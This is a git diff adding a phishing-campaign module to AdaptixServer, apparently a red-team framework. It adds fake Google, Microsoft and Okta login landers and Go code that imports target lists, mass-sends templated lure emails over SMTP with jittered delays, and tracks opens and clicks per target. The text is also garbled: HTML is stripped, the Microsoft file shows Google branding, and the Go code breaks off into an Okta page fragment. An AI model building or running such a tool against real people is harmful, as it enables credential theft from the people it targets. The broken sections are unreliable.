+
+
+
diff --git a/AdaptixServer/extenders/phishing_service/landers/google_login.html b/AdaptixServer/extenders/phishing_service/landers/google_login.html
new file mode 100644
index 000000000..b4e911465
--- /dev/null
+++ b/AdaptixServer/extenders/phishing_service/landers/google_login.html
@@ -0,0 +1,73 @@
+
+
+
+
+
+Sign in
+
+ {{.Email}}
+
+
+
+
+
+
+
+
diff --git a/AdaptixServer/extenders/phishing_service/landers/microsoft_login.html b/AdaptixServer/extenders/phishing_service/landers/microsoft_login.html
new file mode 100644
index 000000000..fa2a0eb87
--- /dev/null
+++ b/AdaptixServer/extenders/phishing_service/landers/microsoft_login.html
@@ -0,0 +1,77 @@
+
+
+
+
+
+
+Google
+
+
+Welcome
+
+
+
+
+
+
+
+{{.Email}}
+
+
+
+
diff --git a/AdaptixServer/extenders/phishing_service/landers/okta_login.html b/AdaptixServer/extenders/phishing_service/landers/okta_login.html
new file mode 100644
index 000000000..ef47095cf
--- /dev/null
+++ b/AdaptixServer/extenders/phishing_service/landers/okta_login.html
@@ -0,0 +1,76 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+Sign in
+ +
+{{.FirstName}}
+{{.Email}}
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/AdaptixServer/extenders/phishing_service/pl_campaign.go b/AdaptixServer/extenders/phishing_service/pl_campaign.go
new file mode 100644
index 000000000..793147acd
--- /dev/null
+++ b/AdaptixServer/extenders/phishing_service/pl_campaign.go
@@ -0,0 +1,643 @@
+package main
+
+import (
+ "bytes"
+ "crypto/tls"
+ "encoding/json"
+ "fmt"
+ "math/rand"
+ "net/smtp"
+ "os"
+ "path/filepath"
+ "strings"
+ "time"
+)
+
+// ============================================================================
+// Call Handlers
+// ============================================================================
+
+func (s *PhishingService) HandleCampaignCreate(operator string, args string) {
+ var c Campaign
+ if err := json.Unmarshal([]byte(args), &c); err != nil {
+ s.sendError(operator, "Invalid campaign data: "+err.Error())
+ return
+ }
+
+ c.ID = generateID()
+ c.Status = "draft"
+ c.CreatedAt = nowUnix()
+ c.CreatedBy = operator
+
+ if c.RedirectURL == "" {
+ c.RedirectURL = "https://login.microsoftonline.com"
+ }
+ if c.SendDelay == 0 {
+ c.SendDelay = 3
+ }
+
+ if err := s.SaveCampaign(c); err != nil {
+ s.sendError(operator, "Failed to save campaign: "+err.Error())
+ return
+ }
+
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleCampaignList(operator string) {
+ s.sendResponseClient(operator, "campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleCampaignDelete(operator string, args string) {
+ var req struct {
+ ID string `json:"id"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ s.mu.Lock()
+ if ch, ok := s.stopChans[req.ID]; ok {
+ close(ch)
+ delete(s.stopChans, req.ID)
+ }
+ s.mu.Unlock()
+
+ s.DeleteCampaign(req.ID)
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleCampaignStart(operator string, args string) {
+ var req struct {
+ ID string `json:"id"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ campaign, err := s.LoadCampaign(req.ID)
+ if err != nil {
+ s.sendError(operator, "Campaign not found")
+ return
+ }
+
+ if campaign.Status == "running" {
+ s.sendError(operator, "Campaign is already running")
+ return
+ }
+
+ targets := s.LoadTargets(campaign.ID)
+ if len(targets) == 0 {
+ s.sendError(operator, "No targets for this campaign")
+ return
+ }
+
+ campaign.Status = "running"
+ s.SaveCampaign(campaign)
+
+ stopChan := make(chan struct{})
+ s.mu.Lock()
+ s.stopChans[campaign.ID] = stopChan
+ s.mu.Unlock()
+
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+
+ go s.SendCampaign(operator, campaign, targets, stopChan)
+}
+
+func (s *PhishingService) HandleCampaignStop(operator string, args string) {
+ var req struct {
+ ID string `json:"id"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ s.mu.Lock()
+ if ch, ok := s.stopChans[req.ID]; ok {
+ close(ch)
+ delete(s.stopChans, req.ID)
+ }
+ s.mu.Unlock()
+
+ campaign, err := s.LoadCampaign(req.ID)
+ if err != nil {
+ return
+ }
+ campaign.Status = "paused"
+ s.SaveCampaign(campaign)
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleTargetsImport(operator string, args string) {
+ var req struct {
+ CampaignID string `json:"campaign_id"`
+ CSV string `json:"csv"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ existing := s.LoadTargets(req.CampaignID)
+ newTargets := parseCSV(req.CSV, req.CampaignID)
+
+ combined := append(existing, newTargets...)
+ if err := s.SaveTargets(req.CampaignID, combined); err != nil {
+ s.sendError(operator, "Failed to save targets: "+err.Error())
+ return
+ }
+
+ s.sendResponseAll("targets", map[string]interface{}{
+ "campaign_id": req.CampaignID,
+ "targets": combined,
+ })
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleTargetsList(operator string, args string) {
+ var req struct {
+ CampaignID string `json:"campaign_id"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ targets := s.LoadTargets(req.CampaignID)
+ s.sendResponseClient(operator, "targets", map[string]interface{}{
+ "campaign_id": req.CampaignID,
+ "targets": targets,
+ })
+}
+
+func (s *PhishingService) HandleTargetsDelete(operator string, args string) {
+ var req struct {
+ CampaignID string `json:"campaign_id"`
+ IDs []string `json:"ids"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ targets := s.LoadTargets(req.CampaignID)
+ idSet := make(map[string]bool)
+ for _, id := range req.IDs {
+ idSet[id] = true
+ }
+
+ var filtered []Target
+ for _, t := range targets {
+ if !idSet[t.ID] {
+ filtered = append(filtered, t)
+ }
+ }
+
+ s.SaveTargets(req.CampaignID, filtered)
+ s.sendResponseAll("targets", map[string]interface{}{
+ "campaign_id": req.CampaignID,
+ "targets": filtered,
+ })
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+func (s *PhishingService) HandleResultsList(operator string, args string) {
+ var req struct {
+ CampaignID string `json:"campaign_id"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ results := s.LoadResults(req.CampaignID)
+ s.sendResponseClient(operator, "results", map[string]interface{}{
+ "campaign_id": req.CampaignID,
+ "results": results,
+ })
+}
+
+func (s *PhishingService) HandleResultsExport(operator string, args string) {
+ var req struct {
+ CampaignID string `json:"campaign_id"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid request")
+ return
+ }
+
+ results := s.LoadResults(req.CampaignID)
+ csv := resultsToCSV(results)
+ s.sendResponseClient(operator, "export", map[string]interface{}{
+ "campaign_id": req.CampaignID,
+ "csv": csv,
+ })
+}
+
+func (s *PhishingService) HandleTemplatesList(operator string) {
+ templates := s.listFiles("templates")
+ s.sendResponseClient(operator, "templates", templates)
+}
+
+func (s *PhishingService) HandleLandersList(operator string) {
+ landers := s.listFiles("landers")
+ s.sendResponseClient(operator, "landers", landers)
+}
+
+func (s *PhishingService) HandleTemplatePreview(operator string, args string) {
+ var req struct {
+ Type string `json:"type"` // "template" or "lander"
+ Name string `json:"name"`
+ }
+ if err := json.Unmarshal([]byte(args), &req); err != nil {
+ s.sendError(operator, "Invalid preview request")
+ return
+ }
+
+ var html string
+ if req.Type == "lander" {
+ html = s.loadLander(req.Name)
+ } else {
+ html = s.loadTemplate(req.Name)
+ }
+
+ if html == "" {
+ s.sendError(operator, "Template not found: "+req.Name)
+ return
+ }
+
+ // Replace template variables with example values
+ replacer := strings.NewReplacer(
+ "{{.FirstName}}", "John",
+ "{{.LastName}}", "Doe",
+ "{{.Email}}", "john.doe@contoso.com",
+ "{{.Company}}", "Contoso Ltd",
+ "{{.Position}}", "IT Manager",
+ "{{.ClickURL}}", "#",
+ "{{.TrackingURL}}", "#",
+ "{{.SubmitURL}}", "#",
+ "{{.Custom}}", "",
+ )
+ html = replacer.Replace(html)
+
+ resp := map[string]interface{}{
+ "preview_type": req.Type,
+ "name": req.Name,
+ "html": html,
+ }
+ s.sendResponseClient(operator, "preview", resp)
+}
+
+// ============================================================================
+// Campaign Sending
+// ============================================================================
+
+func (s *PhishingService) SendCampaign(operator string, campaign Campaign, targets []Target, stopChan chan struct{}) {
+ templateContent := s.loadTemplate(campaign.Template)
+ if templateContent == "" {
+ s.sendError(operator, "Failed to load email template: "+campaign.Template)
+ campaign.Status = "draft"
+ s.SaveCampaign(campaign)
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+ return
+ }
+
+ results := s.LoadResults(campaign.ID)
+ sentIDs := make(map[string]bool)
+ for _, r := range results {
+ sentIDs[r.TargetID] = true
+ }
+
+ for _, target := range targets {
+ select {
+ case <-stopChan:
+ campaign.Status = "paused"
+ s.SaveCampaign(campaign)
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+ return
+ default:
+ }
+
+ if sentIDs[target.ID] {
+ continue
+ }
+
+ trackingID := generateTrackingID()
+ result := Result{
+ ID: trackingID,
+ CampaignID: campaign.ID,
+ TargetID: target.ID,
+ Email: target.Email,
+ FirstName: target.FirstName,
+ LastName: target.LastName,
+ Status: "sending",
+ }
+
+ body := renderEmailTemplate(templateContent, campaign, target, trackingID)
+
+ err := sendEmail(campaign, target, body)
+ if err != nil {
+ result.Status = "error"
+ result.Error = err.Error()
+ } else {
+ result.Status = "sent"
+ result.SentAt = nowUnix()
+ }
+
+ results = append(results, result)
+ s.SaveResults(campaign.ID, results)
+
+ s.sendEvent("email_sent", result)
+
+ delay := campaign.SendDelay
+ if delay > 0 {
+ jitter := rand.Intn(delay/2+1) - delay/4
+ time.Sleep(time.Duration(delay+jitter) * time.Second)
+ }
+ }
+
+ campaign.Status = "completed"
+ s.SaveCampaign(campaign)
+ s.sendResponseAll("campaigns", s.ListCampaignsWithStats())
+}
+
+// ============================================================================
+// SMTP
+// ============================================================================
+
+func sendEmail(campaign Campaign, target Target, htmlBody string) error {
+ from := campaign.SenderEmail
+ to := target.Email
+
+ headers := make(map[string]string)
+ headers["From"] = fmt.Sprintf("%s <%s>", campaign.SenderName, from)
+ headers["To"] = to
+ headers["Subject"] = renderSubject(campaign.Subject, target)
+ headers["MIME-Version"] = "1.0"
+ headers["Content-Type"] = "text/html; charset=UTF-8"
+
+ var msg bytes.Buffer
+ for k, v := range headers {
+ msg.WriteString(fmt.Sprintf("%s: %s\r\n", k, v))
+ }
+ msg.WriteString("\r\n")
+ msg.WriteString(htmlBody)
+
+ addr := fmt.Sprintf("%s:%d", campaign.SmtpHost, campaign.SmtpPort)
+
+ if campaign.SmtpTLS {
+ return sendEmailTLS(addr, campaign.SmtpUser, campaign.SmtpPass, from, to, msg.Bytes())
+ }
+
+ var auth smtp.Auth
+ if campaign.SmtpUser != "" {
+ auth = smtp.PlainAuth("", campaign.SmtpUser, campaign.SmtpPass, campaign.SmtpHost)
+ }
+
+ return smtp.SendMail(addr, auth, from, []string{to}, msg.Bytes())
+}
+
+func sendEmailTLS(addr string, user string, pass string, from string, to string, msg []byte) error {
+ host := strings.Split(addr, ":")[0]
+
+ tlsConfig := &tls.Config{
+ ServerName: host,
+ }
+
+ conn, err := tls.Dial("tcp", addr, tlsConfig)
+ if err != nil {
+ return err
+ }
+
+ client, err := smtp.NewClient(conn, host)
+ if err != nil {
+ return err
+ }
+ defer client.Close()
+
+ if user != "" {
+ auth := smtp.PlainAuth("", user, pass, host)
+ if err = client.Auth(auth); err != nil {
+ return err
+ }
+ }
+
+ if err = client.Mail(from); err != nil {
+ return err
+ }
+ if err = client.Rcpt(to); err != nil {
+ return err
+ }
+
+ w, err := client.Data()
+ if err != nil {
+ return err
+ }
+ w.Write(msg)
+ w.Close()
+
+ return client.Quit()
+}
+
+// ============================================================================
+// Template Rendering
+// ============================================================================
+
+func renderEmailTemplate(template string, campaign Campaign, target Target, trackingID string) string {
+ baseURL := strings.TrimRight(campaign.BaseURL, "/")
+
+ trackingURL := fmt.Sprintf("%s/px/%s.png", baseURL, trackingID)
+ clickURL := fmt.Sprintf("%s/cl/%s", baseURL, trackingID)
+ landerURL := fmt.Sprintf("%s/lp/%s", baseURL, trackingID)
+
+ r := strings.NewReplacer(
+ "{{.FirstName}}", target.FirstName,
+ "{{.LastName}}", target.LastName,
+ "{{.Email}}", target.Email,
+ "{{.Company}}", target.Company,
+ "{{.Position}}", target.Position,
+ "{{.Custom}}", target.Custom,
+ "{{.TrackingURL}}", trackingURL,
+ "{{.ClickURL}}", clickURL,
+ "{{.LanderURL}}", landerURL,
+ "{{.Subject}}", campaign.Subject,
+ "{{.SenderName}}", campaign.SenderName,
+ "{{.SenderEmail}}", campaign.SenderEmail,
+ )
+ body := r.Replace(template)
+
+ if campaign.TrackOpens && !strings.Contains(body, trackingURL) {
+ pixel := fmt.Sprintf(``, trackingURL)
+ if idx := strings.LastIndex(body, "
+
+
+{{.Company}}
+Powered by Okta
+
+
+
+
+
+